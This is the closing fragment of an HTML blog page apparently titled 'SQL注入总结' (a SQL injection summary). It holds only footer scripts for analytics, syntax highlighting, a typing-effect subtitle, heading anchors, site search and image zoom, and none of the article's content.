        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  

  

  

  <!-- cnzz Analytics -->
  



  <script src="https://cdn.staticfile.org/prettify/r298/prettify.min.js"></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  ');
      prettyPrint();
    })
  </script>



  <script src="https://cdn.staticfile.org/typed.js/2.0.10/typed.min.js"></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "SQL注入总结&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script src="https://cdn.staticfile.org/anchor-js/4.2.0/anchor.min.js"></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "false",
      
      icon: "§"
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script src="/js/local-search.js"></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js"></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>











</body>
</html>
